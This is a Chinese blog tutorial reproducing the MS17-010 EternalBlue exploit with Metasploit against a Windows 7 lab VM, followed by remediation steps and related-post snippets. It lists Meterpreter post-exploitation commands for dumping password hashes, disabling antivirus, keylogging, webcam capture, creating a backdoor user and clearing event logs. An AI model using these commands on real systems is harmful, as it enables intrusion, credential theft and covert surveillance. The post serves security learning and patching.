ms17-010永恒之蓝漏洞复现

最新推荐文章于 2025-03-14 21:42:04 发布
最新推荐文章于 2025-03-14 21:42:04 发布
阅读量833 收藏 2
点赞数 1
文章标签: 安全 linux web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaosiyue77/article/details/125047502
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

学安先学法,禁止恶意攻击。该文章仅做学术交流使用,禁止恶意转载使用,本人不承担任何后果。

一、测试环境准备

1.安装VMware

so easy不做描述

2.安装攻击机(kali镜像)

使用清华的镜像。
在这里插入图片描述so easy不做过多描述

1.安装靶机(win7)

同上

二、测试前准备工作

1、打开VMware,开启虚拟机kali与windows7。

2、查看靶机的ip地址,win+R开启命令行输入cmd并回车。开启的窗口里输入ipconfig。查看ipv4地址,我这里是192.168.41.146。
在这里插入图片描述

3、关闭防火墙
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

4、打开kali,ping一下靶机地址,能ping通则表示防火墙成功关闭。Ctrl+c取消操作。
在这里插入图片描述

三、开始测试

第一步:使用kali自带的nmap工具扫描靶机ip,查看是否存在445端口,状态是否正常开启。
在这里插入图片描述

第二步:开启matesploit。
在这里插入图片描述

第三步:寻找有关于永恒之蓝(ms17-010)的模块。
在这里插入图片描述

第四步:使用第3个模块,检索目标靶机是否存在永恒之蓝漏洞。出现下图字样即代表存在。这里需要设置检索的地址,其他选项会自动默认设置。
在这里插入图片描述

第五步:使用第0个模块,攻击目标靶机。这里需要设置payload,攻击的ip地址rhost,其他选项会自动默认设置。详细命令可查看总结。输入run或exploit开始攻击。
在这里插入图片描述

显示以下字样即为攻击成功。
在这里插入图片描述

成功后会显示meterpreter命令提示符,这里可以开展进一步的渗透工作,详细命令可查看总结。
在这里插入图片描述

总结

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。在kali中,自带了Metasploit工具。

永恒之蓝通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

MSF后渗透命令:
切换到目标主机的windows shell:shell
从shell退出到meterpreter:exit
从meterpreter退出到MSF框架:background
查看获得的shell:sessions -l
切换到id为1的shell:sessions -i 1

进阶命令:
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\目录下
getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
run vnc #监控目标机桌面
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
clearev #清除日志

修复方法

(1)关闭445端口
1、win+r,打开regedit。
在这里插入图片描述在这里插入图片描述

2、找到注册表项:
“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”
新建一个值,32位或64位看自己选择,我选择的是QWORD。
在这里插入图片描述

3、重命名该值为SMBDeviceEnabled。
在这里插入图片描述

4、右击修改该值,将数值数据改为0,点击确定,关闭窗口。
在这里插入图片描述在这里插入图片描述

5、win+r,打开services.msc。
在这里插入图片描述

6、找到server服务,双击进入管理控制页面。把这个服务的启动类型更改为“禁用”,服务状态更改为“停止”,最后点击应用即可。
在这里插入图片描述在这里插入图片描述

7、重启电脑生效。
在这里插入图片描述

验证:
1、打开kali,ping一下靶机地址,可以ping通。(关闭了防火墙)
在这里插入图片描述

2、nmap扫描,没有发现445端口。
在这里插入图片描述

3、msf未检查到永恒之蓝漏洞。
在这里插入图片描述

(2)开启防火墙
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(3)安装对应补丁
官网补丁地址:
点击直达https://support.microsoft.com/zh-cn/topic/microsoft-%E5%AE%89%E5%85%A8%E5%85%AC%E5%91%8A-4025685-%E5%8F%97%E6%94%AF%E6%8C%81%E5%B9%B3%E5%8F%B0%E6%8C%87%E5%AF%BC2017-%E5%B9%B4-6-%E6%9C%88-13-%E6%97%A5-d35efef9-190b-31f6-d155-b323eb76779f

这里我一直安装失败,没找到解决方案,不详细描述了。

欢迎交流,不定时持续更新。

xiaosiyue77
关注
Ms17-010永恒之蓝漏洞复现
千寻的博客
01-04 1698
Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2816
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
永恒之蓝漏洞复现(详细版),网络安全工程师必备知识
2201_75863152的博客
04-11 1031
1.检查防火墙是否关闭2.检查远程连接是否开启3.卸载更新的补丁至下面三个即可(没安装vmware tools)
永恒之蓝 MS17-010 漏洞复现
君莫hacker的博客
09-14 755
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 信息收集:2. 使用Metasploit进行测试漏洞3. 漏洞利用0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 SMB服务在Windows与UNIX系列OS之间搭起一
永恒之蓝ms17-010) 漏洞复现
最新发布
2301_78611138的博客
03-14 362
这是一款免费的,可下载的框架,通过它可以很容易的获取,开发并对计算机软件漏洞实现攻击。其本身附带数千个已知软件漏洞漏洞攻击工具。
MS17-010永恒之蓝漏洞复现(手把手教程,超细!)
qq_46089119的博客
02-06 1万+
ms17-010漏洞利用(本地环境复现)
MS17-010永恒之蓝“ 修复方案
鹿鸣天涯
12-07 1万+
一、预防 1、为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快安装此安全补丁,网址为Microsoft 安全公告 MS17-010 - 严重 | Microsoft Docs。 2、及时备份,一定要离线备份重要文件 3、开启防火墙 4、关闭445、135、137、138、139端口,关闭网络共享。   (1)关闭445端口     445端口:在局域网中轻松访问各种共享文件夹或共享打印机   WIN+R 运行--regedit  ...
系统漏洞 - 永恒之蓝MS17_010
Stacey_4869的博客
10-10 928
本文仅作为学习,请勿用于非法用途!
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2327
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
MS17-010永恒之蓝漏洞复现
weixin_65224093的博客
04-04 379
1、概述:永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1323
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝MS17-010漏洞复现
qq_43006864的博客
04-28 1975
攻击机:win10 靶机:win7 一:信息收集阶段 nmap:nmap -sS -sV -A -p- 192.168.1.107 看到目标主机时win7系统,并开启了445端口。存在被攻击的可能。 二、攻击准备阶段。 MSF(win版) (1)查看可利用漏洞exp信息。 search ms17-010 (2)探测漏洞可否被利用。这里选择scanner,对目标主机进行扫描。 执行命令:use 3 或者use auxiliary/scanner/smb/smb_ms1.
MS17-010(永恒之蓝)—漏洞复现及防范》
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
永恒之蓝ms17_010复现
W286734的博客
11-24 729
1.上面图片中#那一列可以看到0,1,2,3,的编号这就是我们可以使用的。当通过hashdump拿到加密和后的密码可以利用对应的解码工具进行解码获得目标机密码。搜索永恒之蓝漏洞编号ms17_010(意思是微软17年发现的第十个高危漏洞)在中端中有一个命令rdesktop加对应的IP地址就可以远程登录目标机。输入show options可以查看我们需要设置的模块。这里弹出的图形每次都不一样,和我的不一样非常的正常。这里的密码等信息是进行加密了的需要自行解密。还有很多可以做的可以输入help进行查看。
Windows靶机永恒之蓝MS17-010漏洞复现
Stubborn_Lanmail的博客
05-13 2499
实验目标 扫描windows靶机漏洞,并使用MSF框架利用漏洞攻击靶机,最后成功获得靶机的控制权 实验环境 攻击机:kali 2020.3 (IP地址:192.168.146.147) 靶机:metasploitable3-win2k8r2(win2008,IP地址:192.168.146.145) 实验步骤 一、利用Nessus工具扫描靶机漏洞 在kali上安装Nessus 从官网上直接下载安装包安装即可(注意版本) Nessus官网地址:https://www.tenable.com 点击右上角“Ne
MS17010(永恒之蓝)漏洞复现
热门推荐
plant1234的博客
11-21 1万+
MS17010(永恒之蓝)漏洞利用与复现 首先需要准备win7的环境做为靶机 获取信息 利用nmap扫描得到,靶机IP nmap -sP 192.168.229.0/24 得到: IP:192.168.229.169 然后利用: nmap --script=vuln 192.168.229.169 得到靶机信息: 发现可能利用的漏洞ms17-010 然后启动msf msfconsole 然后查找漏洞路径: search ms17-010 使用payload进行攻击: use exploit
永恒之蓝(ms17-010)复现
li2495735120的博客
10-15 173
复现ms17-010
复现作业A1
m0_62827634的博客
12-16 2474
1.win7靶机安装easy file sharing server 打开easy file sharing server 将port改为8000,然后点击restart。 2.在kali机上用nmap扫描主机 可以看见主机开启了easy file sharing 服务 3.搜索可利用的漏洞 searchsploit Easy File Sharing Web Server 可以看见有很多可利用的脚本。我们挑选38526.py 4.利用漏洞脚本 python /usr/share/exploi..
ms17-010永恒之蓝漏洞复现与处理
06-06
对于 ms17-010永恒之蓝漏洞复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞。 2. 下载漏洞利用工具:可以使用 Metasploit 框架中的 exploit/windows/smb/ms17_010_eternalblue 模块进行漏洞利用。也可以使用其他的漏洞利用工具。 3. 进行漏洞利用:使用漏洞利用工具对目标系统进行攻击,获取目标系统的权限。 4. 处理漏洞:可以通过升级系统补丁或者关闭 SMB 服务来修复该漏洞。 总的来说,处理 ms17-010永恒之蓝漏洞需要及时进行漏洞扫描和修复,以避免被黑客攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值